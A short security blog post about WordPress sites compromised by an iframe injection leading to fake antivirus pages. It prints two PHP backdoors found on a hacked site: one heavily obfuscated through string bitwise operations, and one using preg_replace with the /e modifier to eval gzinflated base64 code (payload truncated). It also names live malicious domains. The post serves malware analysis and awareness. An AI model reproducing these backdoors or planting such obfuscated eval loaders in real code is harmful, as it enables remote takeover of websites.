Author: Daniel Cid

Seeing many sites compromised with an iframe pointing to http://lowresolutionit.in/in.cgi?6, mostly on outdated WordPress. That domain is currently redirecting to http://hewjzkgvkhwec.tk/27973751.htmland then to fake AV.

Magno (from our support team ) found this pretty backdoor on a compromised site. As we keepsaying, just searching for evals + base64_decode wouldn't cut anymore.

If you enjoy decoding backdoors and are looking for a job, please try this one and send the results to dcid@sucuri.net 🙂

$hlD='iDK'.sGVMQ7;$Uh='mw~g~{~te}o'&movg.'~{'.jwuko;$NWAAkzdZp3E=')!@'|"*\$B";'gqHK'.
     'S0q?E,P;D';$Sfp4z_wg='[@e+v8'^'xd%n8^';$G99ZRs=rqyM_.'|'.ceRQ.'.bJC'|'Cr-!J=4'.
     '" Olu& ';$hEg='$7.5XB; "D!5'|'!86!jP8
"P=*';$tUCPwKkMT9='4~j{'.bsmrr.'^`s'^#M'.
     'a31)GS3")';$ABFU=GvinYpovtk."}iN_?w=f}>}nhp/=YG+^]`".dnmw&'trM/u?wkV:}[Rw/'.
     's}&3:?'.hmYo.'}'.iRw_e9vnMw;$YhV="/[eU_"&'>{wu]';$QwdOlaBF='.'&n;$tD='^mw'&/*'.
     '+r7wsL*/fAw;$lc2dKfnyr='tau}l~'&ootgkv;$uB785Xk0='vb)7|'^'>6}g#';$LcLj="9"^/*'.
     '+_4MR0t<*/x;$_B=w&c;$oNP0EeIWkLS=syu&wio;$iDuSaXky6Y=LTUT_X&z_TY_.'{';'ODO4Zg'.
     'mOZLb{,~s'^'a,>x!:';$g0Vp="?("^qn;$bfv=G|H;$FPMf=('~ew}nw'.
     '|}u}o'&'~gw}nw~|g{n')&$Uh;$NRKZ54=$tD^$NWAAkzdZp3E;$EJzYkUOU=$Sfp4z_wg|/*tsRq'.
     'Rm-bWx~*/$lc2dKfnyr;$WrVZ9W=$G99ZRs&(JaLlV4ruBUSuko|'kLl*'._QqH2O4.'@oj');'A4'.
     '7rL';$ek1OUNY=$hEg^$tUCPwKkMT9;$E5TeI6U=('%1x_r^1'.Z0iL.'~'.huuslyV.#WWqJtW7c'.
     '~]3.>'.lVz7Vm.')Z>){~'&'as~E:~3'.W6oM.'>4'.leKeqON.'{|g}^'.Txvh.'|)z>{}J')^/*'.
     '&*/$ABFU;if($FPMf($NRKZ54($EJzYkUOU($uB785Xk0.$LcLj)),(lTRiTPX.'@'.XZIU.#rkpu'.
     ']jtb<'.W2ZU^'Zdf[`an"oi('.ehSFZ.'^'.oP8f).('
""1b"088b'|"46B(".D4400b).$_B))/*'.
     '(8=*/exit;$WrVZ9W($ek1OUNY,$YhV.$QwdOlaBF.$oNP0EeIWkLS,$EJzYkUOU(/*pu9nkGmceX'.
     'M9La;DNb,**/$iDuSaXky6Y.$JKDCVF98X.$g0Vp.$bfv),$E5TeI6U);#~CTu8z)O?=2?y]!HKZ'.
     'nf(vKmSV>e_Za[d|qeA)hw_baI^^@Z}N!rPq5tBV^u';

Yes, that's all for the backdoor.

Another interesting backdoor:

<?php $ncww = "e/*./"; preg_replace(strrev($ncww),"\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'rVkJc+JG0/4rxLW1Nl8cr0YHoHi1Lz7AxmvwawwY2GxRgMQpjkJiOTb737+e7pmROLxJKm8SS2Km55m+u2cy7CXOfuktp91wOJu2vPUwCIOz00LhNJlMfE/IiUShcPZumPz+ru1cLRbtzdnpaeLitPJqp9qva/4ZNF4y2uPoin/3P9/xV+lbp87f1/wx4A/3zuevYeeuyt/pQo6/WOWlWu3zr6cbc/XEPzbX9farNeafHcPdFnJWtXDbWBZvxs7pOW7d1fkzP+HPJn/UbP4MO3rZB5KOcY1bdfjDt4f81aiX8FcTufM3QNa+559...

You may not be aware, but the preg_replace function with the e parameter, allows full code execution (eval). When you transform the hex chars, you get eval ( gzinflate ( base64_decode ( which runs all the code in the long block of characters inside the preg_replace.